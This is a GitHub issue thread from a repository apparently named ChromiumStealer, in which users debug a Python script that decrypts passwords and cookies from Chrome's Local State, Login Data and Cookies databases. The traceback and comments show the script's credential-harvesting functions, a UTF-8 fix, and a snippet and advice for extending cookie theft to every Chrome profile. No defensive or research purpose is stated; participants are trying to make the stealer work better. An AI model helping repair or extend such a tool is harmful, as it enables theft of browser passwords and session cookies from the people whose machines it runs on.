### ISSUE TITLE
sqlite3.OperationalError: Could not decode to UTF-8 column

### ISSUE THREAD

**Issue by spices941** [BasedBased/ChromiumStealer#7]
I got this error when I tried to use the new code

![error](https://user-images.githubusercontent.com/102199495/170187884-6e2adec5-12a1-4a33-bd89-d277c5673e59.jpg)

`Traceback (most recent call last):`
`  File "C:\Users\test\Chromium\main.py", line 265, in <module>`
`    main()`
`  File "C:\Users\test\Chromium\main.py", line 259, in main`
`    decrypt_files(path, name)`
`  File "C:\Users\test\Chromium\main.py", line 228, in decrypt_files`
`    decrypt_browser(Local_State(path), Login_Data(path), Cookies(path), browser)`
`  File "C:\Users\test\Chromium\main.py", line 159, in decrypt_browser`
`    for index, cookies in enumerate(curr.fetchall()):`
`sqlite3.OperationalError: Could not decode to UTF-8 column 'encrypted_value' with text 'v107�_�[���.�'`

Not sure if my database is corrupted, so I will test with a secondary login data and update if the error happens again

**Comment by ghost** [comment]
Try [this](https://stackoverflow.com/questions/22751363/sqlite3-operationalerror-could-not-decode-to-utf-8-column)

or [this](https://stackoverflow.com/a/23509002/6452438)

**Comment by spices941** [comment]
Update: I change to something like:
`with open(LocalState, "r", encoding="utf-8") as f:` and I was not getting the error anymore

**Comment by AstroOnYT** [comment]
> Update: I change to something like: `with open(LocalState, "r", encoding="utf-8") as f:` and I was not getting the error anymore but I reinstalled chrome anyway and deleted folders completly and did a reinstall created 3 different profiles: 1 `Default`, `Profile 2` with synced gmail account and `Profile 3` with no email attached to the profile
> 
> But I'm still getting the Default data and nothing from the other profiles
> 
> I do get data if I change it for example to:
> 
> ```
> def Cookies(path):
> if "Profile" in path:
>         return f"{path}\\Network\\Cookies"
>     else:
>         return f"{path}\\User Data\\Profile 3\\Network\\Cookies"
> ```
> 
> ~Default~ Profile 3

yea that means ur going to need to make a file path for all of the profiles lol its only coded for profile 1. chrome has a weird thing like that so good luck putting like 5 profile paths in

**Comment by ksdodk** [comment]
> 

in my code it is made for all profiles
